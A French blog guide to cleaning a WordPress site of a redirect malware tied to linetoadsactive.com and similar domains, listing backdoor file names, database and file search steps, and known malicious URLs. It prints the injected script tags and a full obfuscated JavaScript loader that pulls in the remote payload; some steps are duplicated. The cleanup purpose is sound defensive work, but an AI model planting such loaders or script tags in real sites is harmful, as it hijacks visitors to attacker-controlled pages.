Malware cartoonmines : comment s’en débarrasser ?

Sophie Laurent

Technologie

Ce guide vise à supprimer la redirection linetoadactive, mais vous pouvez l’utiliser comme guide pour supprimer d’autres redirections de logiciels malveillants en remplaçant le domaine du logiciel malveillant par celui vers lequel votre site redirige.

Vous êtes probablement ici parce que votre site WordPress (ou pire encore, le site WordPress de votre client) effectue des redirections ou affiche un message d’attente, et vous avez identifié la coupable comme étant linetoadsactive.com ou lovegreenpencils.ga. C’est tellement énervant, et en plus ça vous perdre du temps !

Vous avez peut-être supprimé certains des fichiers index.php malveillants qui ont été générés ou injectés dans le code, mais vous ne parvenez toujours pas à arrêter les redirections, et vous êtes sur le point de refermer silencieusement votre ordinateur portable, d’éteindre votre téléphone et de marcher vers le coucher du soleil. Rassurez-vous, développeur web fatigué, cette situation a une solution.

Il s’agit d’un hack particulièrement ennuyeux et complexe, capable d’infecter tout votre serveur. Nous avons trouvé des cas de ce logiciel malveillant si bien dissimulé que le code malveillant est injecté dans des centaines de fichiers PHP et d’entrées de base de données, dans chaque installation WordPress sur le serveur. Vous devrez suivre ces étapes pour chaque site WordPress de votre serveur afin de vous assurer qu’il a été éliminé.

Ce guide suppose que vous êtes un développeur web et que vous êtes familier avec SSH, phpmyadmin, que vous avez sauvegardé votre site et que vous avez les compétences nécessaires pour restaurer votre site en cas de problème lors de la suppression. Utilisez ces informations à vos propres risques. Si vous souhaitez qu’un de nos professionnels WordPress supprime cela pour vous, appelez-nous au (844) 939-2704 ou cliquez sur le bouton de chat sur cette page.

1. Supprimer la porte

Dans la plupart des cas que nous avons rencontrés, ce hack provient de plugins WordPress non autorisés, pirates ou non sous licence, qui regroupent les fichiers PHP suivants utilisés comme porte dérobée pour accéder à votre site :

Lire aussi  Mp3juices.cc : Comment se débarrasser des publicités

rms-script-ini.php
rms-script-mu-plugin.php
rms_unique_wp_mu_pl_fl_nm.php

La première étape consiste à rechercher sur votre serveur chaque occurrence de ces fichiers et à les supprimer, ainsi que toutes les lignes de code dans les fichiers qui les mentionnent. Notez que si quelqu’un visite votre site, les fichiers seront régénérés, sauf si vous supprimez les trois – assurez-vous donc de vérifier à la fin de ce processus qu’ils ont bien disparu après leur suppression.

Attention : supprimer ces trois fichiers peut provoquer une erreur critique de WordPress, car les plugins compromis avec lesquels ils étaient regroupés continueront d’essayer de les appeler. Vous devez soit remplacer le plugin en question par la version sous licence correcte du fournisseur, supprimer le code des fichiers du plugin qui fait référence aux fichiers mentionnés ci-dessus, soit désactiver complètement le plugin pour éviter ce scénario.

2. Rechercher le script de redirection injecté dans la base de données

Cette redirection malveillante n’infecte pas seulement les fichiers PHP, elle injecte également le script de redirection dans la base de données de votre site WordPress. Vous devez vous connecter à phpmyadmin et rechercher dans la base de données WP les chaînes « linetoadsactive » ou « lovegreenpencils », en fonction de celui vers lequel votre site redirige. Vous obtiendrez probablement de nombreux résultats dans wp_posts, ainsi que dans les paramètres URL de votre site

  • rms-script-ini.php
  • rms-script-mu-plugin.php
  • rms_unique_wp_mu_pl_fl_nm.php

La première étape consiste à rechercher sur votre serveur chaque occurrence de ces fichiers et à les supprimer, ainsi que toutes les lignes de code dans les fichiers qui les mentionnent. Notez que si quelqu’un visite votre site, les fichiers seront régénérés, sauf si vous supprimez les trois – assurez-vous donc de vérifier à la fin de ce processus qu’ils ont bien disparu après leur suppression.

Attention : supprimer ces trois fichiers peut provoquer une erreur critique de WordPress, car les plugins compromis avec lesquels ils étaient regroupés continueront d’essayer de les appeler. Vous devez soit remplacer le plugin en question par la version sous licence correcte du fournisseur, supprimer le code des fichiers du plugin qui fait référence aux fichiers mentionnés ci-dessus, soit désactiver complètement le plugin pour éviter ce scénario.

Rechercher le script de redirection injecté dans la base de données

Cette redirection malveillante n’infecte pas seulement les fichiers PHP, elle injecte également le script de redirection dans la base de données de votre site WordPress. Vous devez vous connecter à phpmyadmin et rechercher dans la base de données WP les chaînes « linetoadsactive » ou « lovegreenpencils », en fonction de celui vers lequel votre site redirige. Vous obtiendrez probablement de nombreux résultats dans wp_posts, ainsi que dans les paramètres URL de votre site dans wp_options. La première étape consiste à rétablir l’URL de votre site dans les tables wp_options. Ensuite, copiez la chaîne trouvée dans votre table wp_posts, qui devrait ressembler à ceci :

<script type=‘text/javascript’ src=‘https://trend.linetoadsactive.com/m.js?n=ns1’></script>

Faites maintenant une recherche SQL & remplacez toutes les occurrences de la chaîne trouvée en la remplaçant par rien. N’oubliez pas de le faire pour chaque installation WordPress de votre serveur.

Lire aussi  Les paiements via mobile en hausse de 137 % : pourquoi ce succès va encore monter

Rechercher le code malveillant dans les fichiers PHP et HTML

Maintenant, vous devez utiliser des commandes SSH pour rechercher « linetoadsactive » et « lovegreenpencils » dans tous vos fichiers PHP et HTML. Les résultats obtenus devraient ressembler au code injecté dans votre base de données, mais peut-être avec une chaîne différente à la fin :

<script type=’text/javascript’ src=’https://trend.linetoadsactive.com/m.js?n=nb5′></script>

Faites ensuite une recherche et remplacez toutes les chaînes dans les fichiers PHP et HTML en les remplaçant par rien. Mais vous n’avez pas encore terminé, ce petit script malveillant a également injecté du code obscurci qui continuera de provoquer des redirections sur votre site. Effectuez une autre recherche SSH pour tous les fichiers PHP et HTML contenant « 115,99,114,105,112,116 ». Vous obtiendrez quelque chose comme ceci :

<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>

Il s’agit simplement de code obscurci qui charge les mêmes scripts ci-dessus.

Étapes finales

Comme je l’ai mentionné précédemment, vous devez répéter ces étapes sur chaque installation WordPress de votre serveur. Si vous en avez qui sont inactives, c’est le moment de les supprimer. Revenez également à l’étape 1 et assurez-vous que les trois fichiers PHP n’ont pas réapparu. Si c’est le cas, supprimez-les à nouveau, visitez votre site dans une fenêtre privée et vérifiez s’ils ont réapparu. Si c’est le cas, vous n’avez pas réussi à supprimer la porte dérobée.

Si vous souhaitez qu’un de nos professionnels WordPress supprime cette redirection pour vous, appelez-nous au (844) 939-2704 ou cliquez sur le bouton de chat sur cette page.

Liste des URL associées à ce logiciel malveillant :

  • https://well.linetoadsactive.com/det.php
  • https://done.linetoadsactive.com/go.php
  • https://live.linetoadsactive.com/go.php
  • https://trend.linetoadsactive.com/go.php
  • https://trend.linetoadsactive.com/m.js?n=nb5
  • https://trend.linetoadsactive.com/m.js?n=ns1
  • https://boliverfernanrdos.ga/?p=hfqwmzrrmu5gi3bpguydgni
  • https://boliverfernanrdos.ga/w_31.js
  • https://load7.biz/sw/w1s.js
  • https://dock.lovegreenpencils.ga/m.js?n=nb5
  • https://cht.secondaryinformtrand.com/m.js?n=nb5
  • default7.com
  • test246.com
  • test0.com
  • distinctfestive.com
  • ableoccassion.com
  • djengysdaro.com
  • cartoonmines.com/scount

Partagez avec vos amis !

Facebook
Twitter
WhatsApp
LinkedIn

Soutenez-nous en nous ajoutant à vos favoris Google Actualités

Sophie Laurent

Sophie Laurent

Sophie possède une maîtrise en Gestion des Médias et de la Communication. Son parcours professionnel l'a conduite à travailler dans le domaine de la communication d'entreprise. Elle excelle dans l'art de conjuguer les pratiques médiatiques avec les exigences de la gestion, ce qui fait d'elle une directrice polyvalente. Elle est également une mélomane passionnée, intégrant cette passion dans notre média.

A lire aussi

 

Blogoergosum

Notre équipe d'experts en marketing est dédiée à vous fournir les dernières actualités, débats et événements qui façonnent le paysage marketing contemporain. 

Avec notre approche innovante, nous vous donnons les moyens de passer à l'action à partir de nos articles, contribuant ainsi à la création d'une société plus durable et à la réussite de votre stratégie marketing. 

Newsletter
Ne rater plus les infos
 

 

 

 

© 2023 Blogoergosum

Contact

Notre équipe

Mentions légales

CGU

Qui sommes-nous